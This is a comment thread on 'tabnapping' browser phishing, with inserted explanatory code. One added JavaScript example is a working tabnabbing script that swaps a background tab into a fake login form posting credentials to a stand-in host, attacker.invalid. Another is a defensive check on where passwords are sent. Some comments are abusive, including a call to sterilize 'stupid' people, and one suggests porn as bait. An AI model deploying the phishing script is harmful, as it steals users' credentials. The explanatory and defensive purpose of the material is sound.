Tabnapping Scams Around the Corner?
scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping that was recently outlined by Aza Raskin. The short story is that background tabs are updated with login forms impersonating the sites they originally contained, but hosted by helpful third parties primarily interested in your password. (CT:Original writeup removed at request of submitter)
...so are people really dumb enough to go "oh right, my bank's webpage" without realizing they didn't bring it up themselves?
This is why it's so important to check the address of the site you're about to log into.
People who do this crap of stealing people's accounts or identities should be shot.
Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.
And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common (if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.
You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.
You see this, and think "Why didn't someone think about this before?"
Without having RTFA:
That sounds a lot more complicated as you'd need to hack at least one high traffic website, read the cookies stored by the browser, and then force a meta-refresh only when the user isn't looking.
He could have come up with something a little less douchey than "tabnapping". Next thing you know, everyone will be saying, "I've been tabnapped!"
Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I have 'seen' this done 10 years ago to gain access to some chat accounts.
You can't handle the truth.
Not exactly. From his page on this "exploit"...
So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
Dear Slashdot: I submitted the above story this morning and was pleased when it was accepted for publication on your website. However, I was a little peeved to find that the link I included in the story was substituted in the final story with this one. Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to Slashdot in the first place. Any chance of swapping the link back?
I'm supposed to open a tab, go to a website, open a second tab, go to a compromised website which changes the content of the first tab without my interaction, and then log on to the site presented in the first tab? Don't you think that I'll notice that I'm not on the same website I was on previously?
Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on, and not blindly click away every message box or enter details into every site they're presented with.
who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly
i mean this is a brilliant attack. so, whoever thought this up, why aren't you making millions in a respectable way? you obviously have the brains to do that
some people just have to be assholes
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
My two cents as far as tabs go, is that a window should be a window - not a collection of tabs - for the simple reason that tabs obfuscate (hide) the content within. Yes, I can see the advantages of tabs within some UIs in certain situations - for example: segmenting "general" from "advanced" preferences; stepping data through a process, or in a rich client application where data is related.
Where tabs are a bad fit for browsing is that the data viewed in web apps is often too disparate - there is no linkage between any of the tabs within a "window" - the content of what is presented within is asynchronous and disconnected - tabs in browsers never have a true relationship with each other. Sure - you might be looking at two related sites, or two pages within a site, but tabs offer nothing (UI-wise) that a window cannot do. A new window offers a single view of a chunk of information; if you need another view, why not simply use another window. A mish mash of windows filled with tabs does not improve the UI in any way.
This attack only works if you allow Javascript by default, instead of only whitelisting sites that you trust.
Can Javascript really access other tabs or windows? Shouldn't it be restricted to its own page/tab/window?
like you said, you are logged into Facebook right now. Would you not find it suspicious if when you clicked back over to it, you were greeted with a login screen?
A lot of web sites periodically invalidate session cookies after 24 hours. In that case, the next link you click even on the legitimate site will present a login screen.
No, because this is REALLY dangerous for Yahoo Mail.
I'm logged in, and it likes to revert back to login pages all the time! It even makes you login twice "to check your security". So this TabMcNab exploit is going to be really dangerous somewhere. I'm pretty sharp, but that page has cried wolf so many times I would have fallen for this if it was grade-A delivered.
i am so goddamned tired of hearing these stories that say "oh noes, stupidity might be painful, what will we do, it's so terrible, simpwy tewwible!" if you are stupid you should not breed. if you are stupid, nature has only ever had one cure for that, a little good old Darwinism natural selection. why the fuck do we care so much about them getting ripped off and having some money taken away when we should be sterilizing them surgically?
Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server that is done sometime after the page is loaded as a delayed response to the browser request?
It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.
AND if you're not using noscript (or equivalent) or you allow that site to run whatever javascript it wants. And so forth.
So this is a pretty clever thing to do. The issues here are that it's sneaky, remarkably effective (even against those who are security-aware), and difficult to stop, since tabbed browsing is generally regarded as a good thing.
One possible solution would be to have browser support for user-opted website whitelisting. When you visit a site where you require security (banking, etc.) for the first time, you can configure your browser to add the domain to a security-aware whitelist. Every time, from then on, when you visit that page, your browser visually (and obviously) marks that page (gold border, animated lock, etc.) if its SSL credentials check out. As a user, I would simply have to know "always check for those visual effects before you enter your banking information", which is not a hard thing to remember.
Another would be to have a browser-supplied interface for entering credentials that can be invoked by the site. You click the log-in button, your browser supplies a "Guaranteed Secure" login modal dialog, you enter your information, and your browser then forwards it to the page and logs you in. You can then add important domains to the list, and your browser will never pop-up that dialog for a page that isn't on that list. Same as above, you would elect to whitelist sites that are important in advance, and because it's a browser-supplied login, no fake tab (or fake SSL certificate) will be able to induce that dialog.
At some point, people will figure out clever ways around things. The browser needs to be able to accommodate the idea that every page on the Internet is not equal from the point of view of the user. There must be a mechanism by which the browser can allow a user to easily (visually) differentiate between a legit page and one that has made itself look legit.
As far as I can tell, the script merely waits a while (hoping that the user's attention is diverted) before changing the contents. Surely, the same idea works about as well if the user uses multiple windows rather than multiple tabs. Just as soon as attention is diverted from the appropriate browser and it is covered by other windows, the content could be changed without the user noticing.
The only difference is that, with multiple windows, a portion of the window may still be visible when the user is looking at another window. In my limited experience, folks tend to maximize windows anyway (I *hate* that!), so that's not a significant issue.
Am I missing something?
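The two comments above ("wait until you are away from HIS tab and then alter HIS tab" and "the script merely waits a while before changing the contents") describe the whole mechanism. Here is that mechanism as an added example, not code from Raskin's page or from any commenter: the page listens for loss of focus, waits, and then rewrites its own title, favicon and body into a look-alike login form. Note what does not happen: there is no navigation, so tab-locking add-ons that only block navigation do not fire (as one commenter found), and the address bar keeps showing the attacker's origin, which is the one thing the page cannot rewrite. The timing logic is kept apart from the DOM so the file also runs under Node; the DOM wiring at the bottom only executes inside a browser. The "Example Mail" brand, the attacker.invalid host and the 5-second delay are invented placeholders.

```javascript
// Added example (not from Raskin's page or any commenter): a model of the
// tabnabbing trick as the comments describe it. The page notices it has
// lost focus, waits, and then rewrites ITS OWN title, favicon and body to
// look like somebody else's login form. Nothing navigates, so the address
// bar keeps showing the attacker's origin. Timing logic is separated from
// the DOM so this file also runs under Node; the DOM wiring at the bottom
// only executes inside a browser. The "Example Mail" brand and the
// attacker.invalid host are invented placeholders.

const SWAP_DELAY_MS = 5000; // arbitrary: long enough for the user to forget the tab

// Tracks focus and decides, exactly once, when the swap should fire.
// `clock` is injectable (returns ms) so the behaviour can be tested without timers.
class TabnabModel {
  constructor(delayMs, clock) {
    this.delayMs = delayMs;
    this.clock = clock;
    this.blurredAt = null;   // time the tab lost focus, or null while focused
    this.swapped = false;
  }
  onBlur() { if (this.blurredAt === null) this.blurredAt = this.clock(); }
  onFocus() { if (!this.swapped) this.blurredAt = null; } // a glance back resets the wait
  shouldSwapNow() {
    if (this.swapped || this.blurredAt === null) return false;
    if (this.clock() - this.blurredAt < this.delayMs) return false;
    this.swapped = true;
    return true;
  }
}

// The replacement content, kept as data so a defender can see exactly which
// three things change: title, favicon, and where the form posts.
function fakeLoginPage(brand) {
  const slug = brand.replace(/\s+/g, '').toLowerCase();
  return {
    title: `${brand} - Sign in`,
    favicon: `https://attacker.invalid/${slug}.ico`,      // copied icon, attacker-hosted
    html: `<form method="post" action="https://attacker.invalid/collect">
  <h1>Your ${brand} session has expired. Please sign in again.</h1>
  <label>Email <input name="user" autocomplete="username"></label>
  <label>Password <input name="pass" type="password"></label>
  <button>Sign in</button>
</form>`,
  };
}

// Browser wiring: blur/focus events feed the model; a polling timer asks it
// whether to swap. Runs only when a DOM is present.
function installTabnab(doc, win, brand) {
  const model = new TabnabModel(SWAP_DELAY_MS, () => Date.now());
  win.addEventListener('blur', () => model.onBlur());
  win.addEventListener('focus', () => model.onFocus());
  const timer = win.setInterval(() => {
    if (!model.shouldSwapNow()) return;
    const page = fakeLoginPage(brand);
    doc.title = page.title;
    let icon = doc.querySelector('link[rel~="icon"]');
    if (!icon) {
      icon = doc.createElement('link');
      icon.rel = 'icon';
      doc.head.appendChild(icon);
    }
    icon.href = page.favicon;
    doc.body.innerHTML = page.html;  // in-place rewrite: no navigation, URL unchanged
    win.clearInterval(timer);
  }, 250);
  return model;
}

if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  installTabnab(document, window, 'Example Mail');
}
```

Because the swap is only a timer that fires after focus is lost, it works the same with separate windows as with tabs, and throttling scripts in background tabs only delays it. The defender's check is the one the thread keeps repeating: before typing a password, read the address bar, since the page can change everything except that.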
You are not to blame, because even the browser creators misunderstand SSL.
- SSL does not mean that it is safe to input credentials.
- More GUI does not help much.
- If a site makes an error with SSL (expired, or changed subdomain) you only have an all-or-nothing option.
As your parent article states, there already is an option to only enable JavaScript on trusted sites (NoScript), but this relies on whitelisting particular sites. Only security-paranoid people (like me) use it.
I tried it out and Protected/Froze/Locked the tab and the exploit ran.
I think it's because the full contents were loaded and it didn't actually try to navigate anywhere.
It's conceivable, especially under this circumstance, that an already open (let's say) Gmail page is re-written. What's the first thought that might come to mind? Oh, it auto logged off - only to have people "log back in". Agreed. This issue has potential. Bring out the fixes - soon!
"Slashdot is about news, not driving traffic to someone's website. And 'getting traffic' is not some kind of exchange or reward offered for submitting an article. If a different link is editorially better, then it is expected that the editors will swap it." - by mysidia (191772) on Tuesday May 25, @09:42AM (#32335284)
Ahem: BULLSHIT! Slashdot's altering scamdetect's post is doing EXACTLY WHAT YOU ACCUSE SCAMDETECT OF (basically): Slashdot's editors altering scamdetect's source data is directing traffic to a "crony" of these so-called story editors' favorite/pal/affiliate (their crony in other words) site imo @ least... taking/playing "favorites" in essence.
Krebs on security appears to be a "crony" (or what's the word SEO optimization scammers use? Oh, yes: "Affiliates") of the editors here!
AGAIN: The editors here are in fact violating what you said yourself about "driving traffic to someone else's site" (which is EXACTLY what they're doing by taking out the url link that spamdetect put up, and putting in one of the slashdot editors' own choice instead).
After all - Neither Kreb's article (dated Monday, May 24th, 2010 at 9:07 pm) nor the one scamdetect put up (dated today, Tues. May 25th, 2010) are the original discoverers of this material, so neither one's date data really matter either, as to "whom posted what first"!
Nor is either one better than the other, imo @ least, editorially!
(Now, as far as MY credentials in this field? Ok - I am a multiply degreed college grad here no less in both CSC & MIS, complete with all the English you'd ever need in both of those degrees I have on the subject of computer sciences (along with 16 yrs. of professional experience on my part & being multiply internationally published for my works in this science, plus being featured as tech shows like MS TechEd 2 yrs in a row as a finalist for commercial code work & ideas in the hardest category there in SQLServer Performance Enhancement while on paid contract to do so increasing the programs used effectiveness by 40% or more (block level device driver work & data structuring in said commercial wares of "Enterprise Class" scale classification) for them no less also)).
I wonder who is more qualified on the subject of computing here... myself, or the "editors of slashdot"? I say that, because I disagree with your statements/thoughts, strongly, and I wager that the story editors here aren't even as qualified on this science & subject as I am (nor moreso on their parts in English either).
Secondly: What exactly qualifies Slashdot's editors as to "what's better editorially"?
Again - Do they have degrees in English to substantiate that they themselves are "expert" on what's better, editorially??
I'd wager not.
Man - You're the pot calling the kettle black man!
(Plus, this isn't the first time I have seen this type of shenanigan out of slashdot (or other news websites) either!)
This happens ALL THE TIME (in catering to "partners/affiliates/favorites" (spelled sideways = CRONIES!)), & I also feel it's wrong as well.
APK
P.S.=> Bottom-line? Well, I also think scamdetect has every right to be upset that his submission was altered by the story editors here, as to the link submitted data as the source, because I'd actually wager that Brian Krebs may be no more qualified as an expert in this area than are the folks that scamdetect originally used as his source data in fact - unless someone can show me that Brian Krebs has his CISSP certification, or an actual A.A.S. or B.S. (or better in post grad masters or doctoral work) in CSC related disciplines (or, those CSC degrees specifically related to computer security actually)... apk
Why not use different profiles with the -no-remote option? Even if you have multiple tabs open and multiple browser windows, have a profile for financial operations only, or whatever you want to protect and have a persona that is easily recognized for that purpose. Then browser history with personal finance history will not be exposed to your other browsing.
Except that so many websites are JavaScript dependent that temporarily allowing JS from a page is fairly common for all but the most paranoid. Design your malicious site to be unusable without JavaScript, 90% of NoScript users will at least temporarily whitelist it if the content is of sufficient interest; I recommend porn. When they quickly switch tabs so their bosses don't see the porno site, switch to a fake log-in screen.
Yeah, most people will catch it, but you aren't coding for most people. You're coding for dumbasses (or people ignorant of this exploit with little native skepticism), and even among NoScript users, I guarantee a few percent of them forget what they were doing, overlook the address bar, and rationalize the log-in screen by assuming they must have opened it and forgot about it, then remember something they needed to do and enter their log-in details.
So a page renders itself then waits until it's inactive then rerenders it won't take long for a patch.
I've never understood tabs myself. I already had tabs built into my operating system; they called it the taskbar. What's the vulnerability being attacked here anyway? I know of no way for content in one tab to insert content or even change the location of another tab ...
*DrugCheese rants*
I think I'd want to have some kind of referendum on what "stupid" is before I'd agree to the whole sterilization thing.
And as far as natural selection taking care of stupidity, it much more often seems like the stupider one is the more their reproductive practice takes on a pattern similar to that of voting in Chicago: early and often.
I don't see why it would be so hard for Firefox to simply report to the user a warning when they begin to send a particular password to a "new" site, one that they haven't sent a password to before, and even more-so if the password is generally sent to another site.
I think this solution fits the problem well, as you're trying to prevent yourself from sending passwords to places that shouldn't get them.
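The check proposed in the comment above, worked through as an added example (a hypothetical design, not Firefox's own code): a browser-side vault of saved logins is consulted before a credential leaves the page, and the submission is flagged when the typed password is one the user has only ever saved for a different site. That is exactly the tabnabbed case: a Gmail password about to be typed into a page whose origin has never received it. The mail.example.net and attacker.invalid hosts and the sample credentials are constructed placeholders.

```javascript
// Added example: a password-destination check of the kind the comment
// above proposes. A browser-side vault of saved logins is consulted before
// a credential leaves the page, and the submission is flagged when the
// typed password is one the user has saved for a different site. This is
// a hypothetical design, not Firefox's own code; the hosts are placeholders.

function originOf(url) {
  return new URL(url).origin;   // scheme + host + port, e.g. https://mail.example.net
}

// Saved logins as a password manager would hold them.
class LoginVault {
  constructor() { this.entries = []; }            // { origin, username, password }
  save(url, username, password) {
    this.entries.push({ origin: originOf(url), username, password });
  }
  savedFor(origin, password) {
    return this.entries.some(e => e.origin === origin && e.password === password);
  }
  otherOriginsUsing(origin, password) {
    const others = this.entries
      .filter(e => e.password === password && e.origin !== origin)
      .map(e => e.origin);
    return [...new Set(others)];
  }
  knows(origin) { return this.entries.some(e => e.origin === origin); }
}

// Classify a pending credential submission.
//   pageUrl   - the document the user is typing into (what the address bar shows)
//   actionUrl - where the form will post
// The decision is keyed on the PAGE origin: a script can ship a password
// anywhere regardless of the form's action, so the action is only an extra
// signal, never the thing that makes a submission safe.
function checkSubmission(vault, pageUrl, actionUrl, password) {
  const page = originOf(pageUrl);
  const action = originOf(actionUrl);
  if (action !== page) {
    return { verdict: 'block', reason: `form posts to ${action} from a page on ${page}` };
  }
  if (vault.savedFor(page, password)) {
    return { verdict: 'allow', reason: `password already saved for ${page}` };
  }
  const reusedOn = vault.otherOriginsUsing(page, password);
  if (reusedOn.length > 0) {
    // The tabnabbing case: a known password about to go to a site that has never had it.
    return { verdict: 'warn', reason: `this password is saved for ${reusedOn.join(', ')}, never for ${page}` };
  }
  if (vault.knows(page)) {
    return { verdict: 'prompt', reason: `new password for ${page}` };
  }
  return { verdict: 'prompt', reason: `first password ever sent to ${page}` };
}
```

The match is on the full origin, so a legitimate move between, say, accounts.example.net and mail.example.net would also warn; a shipping implementation would relax that to the registrable domain, at the cost of letting a look-alike subdomain of a compromised site through. The warning only helps for passwords the browser has seen before, which is why the comment frames it as a reuse check rather than a phishing filter.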
.. leave your bank tab open and walk away.
Sure I'll leave facebook or gmail open, but there's limited damage that can happen from someone hacking them.
Also for some reason I usually have two windows open, one for "serious business" where Gmail is the first tab, Facebook is the second tab, then whatever else I happen to be looking at in the other tabs. Then in a whole other window there's the random YouTube, flash games and StumbleUpon results. Always keeping Facebook and Gmail in the same tabs limits the chances of me being tricked by this by anything I regularly log into. WTF is Gmail doing all the way over here!?
As the richness of the web experience increases due to interactive technologies available on the client-side unscrupulous people work to catch people off-guard for their own advantage. At the most benign level this is done by advertisers seeking to gain attention. At the worst thieves use client-side scripting as a virtual pickpocket tool.
When possible I remind my family members to stay on alert when on-line (or even off-line). This includes not clicking on links in email, of course. It also includes not logging into a service unless they have entered the URL themselves or used a bookmark they have set up. Yes, this does not prevent MitM attacks and will not protect them from a scheme that changes a browser's bookmarks. But it solves the bulk of the phishing attacks to date.
One reason I prefer specialized apps for important services (banking, on-line status update services, email) over using a generic web interface is that specialized apps are less prone to be faked by XSS, phishing look-a-like pages, etc. This is especially true of closed platform apps like iPhone/iPad apps that undergo an approval process by a third party.
Sad as it is to admit one benefit to the lack of "freedom" on the iPhone/iPad platform is protection from scammers.
What is an open alternative to protecting the unaware from these scams? I'm all ears.
otherwise, you're appearing to myself as another "let's butter up the owners/mods at slashdot" type
Ok, I'll clear up a few things:
Yes, there are people with alternate logons; but I've had exactly two: this one, and when I lost my password for a time I used the other one. One would think that a person would friend alternate identities; you really think I have over 200 alternate identities?
The fact is, I'm simply a longtime slashdot reader who loves the site and tries to contribute the best I can.
As to "mods", I post too often to get mod points (although I get metamod points).
we're not foolish enough to register here to be easily tracked for trolling registered users
Too bad you're not registered, because you'll probably not see my reply. That's an advantage of being logged on -- you're informed of replies to your comments and can have an intelligent conversation with people way more knowledgeable and intelligent than me; one of the great things about this site is you can actually LEARN stuff sometimes from some of the comments. Scientists from all sorts of disciplines, engineers, designers, from all over the world post here. You're not going to find discussions like you see here at Digg, or anywhere else for that matter.
"My Name is Ozymandias: King of Kings - Look upon my works, ye mighty, & DESPAIR..."
Oh the bold lettering, the all-caps, the irony that is the quote... Your post wouldn't be nearly so hilarious without it. Thanks again for a good laugh.
By the way Andrew, let me know when you get a citation for an article in a peer-reviewed journal that is at least semi-recent. It'll make the copy-pasting of your minimal accomplishments that much more entertaining.
Those who can, do. Those who can't, sue.
Damn you Opera! If you hadn't invented tabbed browsing, none of this would have happened!!
Alexander Peter Kowalski (since you insist on people using your full name), thank you for that morning of entertainment. Your level of delusion and OCD-ness is both side-splittingly hilarious and saddening. It's like watching a train-wreck. I know I shouldn't laugh, but the self-inflicted nature of the wreck is what makes it so damn funny.
The real smart users don't do "real things" via "go back" or "left open" windows. When I bank etc., I use a freshly opened window (if not always a fresh browser, but one can only be so paranoid) opened with File > New, not Ctrl-N etc. Then I do my business and get out.
Sure my slashdot.org and my social and dating site kinda crap stays logged in, but so what.
If it's real business I don't go there unless I typed the URL by hand. I don't even bookmark the sites for my bank and credit card etc because _I_ have been expecting the bookmark rewriting attack as more likely than tab reassignment. But who am I to judge...
At least his name carries a lot of weight: http://www.jeremyreimer.com/phpbb2/viewtopic.php?t=4128 and http://www.thorschrock.com/2008/05/19/how-to-respond-when-people-threaten-to-sue-you-on-the-web/
My bank has what I consider to be really good security.
My login page just asks for my account number.
Then, the bank proves who it is to me -- by showing me a picture of my choosing and a passphrase of my choosing -- before it asks me for my password.
In other words, before it asks me to give a secret away, it verifies itself with a secret.
As if that weren't good enough, on any browser that I haven't registered, it gives me a challenge question. So, to fake this, even if the scammer managed to get my account name and password, it doesn't have the browser credential, and can't get past the security question; it can't pretend to be my bank because it doesn't know my picture and passphrase (only delivered over SSL), etc.
To clarify: I give my account number. If it is playing MITM, it gets a challenge question, which it can't answer and I know is invalid if it passes it to me; if it wants to bypass that and just ask for my password, it doesn't know what image/phrase to show; it can't play transparent MITM and watch because of SSL security and lack of browser private key credential. That's the best security I've seen so far. Just fails to keylogging software, but that's what a PPC mac is for :-).
A mini-remark: typing stuff on an on-screen keyboard will not help you.
Of course, it depends on the type of keyboard you are using and on the platform, but for instance - Windows' osk.exe (the default one) works by sending WM_KEYUP and WM_KEYDOWN messages to an input window.
A keylogger that uses hooks to watch messages sent to that window will still see the keystrokes.
You can try this hint: http://www.lazybit.com/index.php/a/2007/03/01/free_keylogger_protection It will confuse the person who reads the log, but it makes the data entry procedure much longer and error-prone.
p.s. keystrokes typed inside a virtual machine can also be grabbed, as the host OS "sees" them first, and that's where the keylogger is.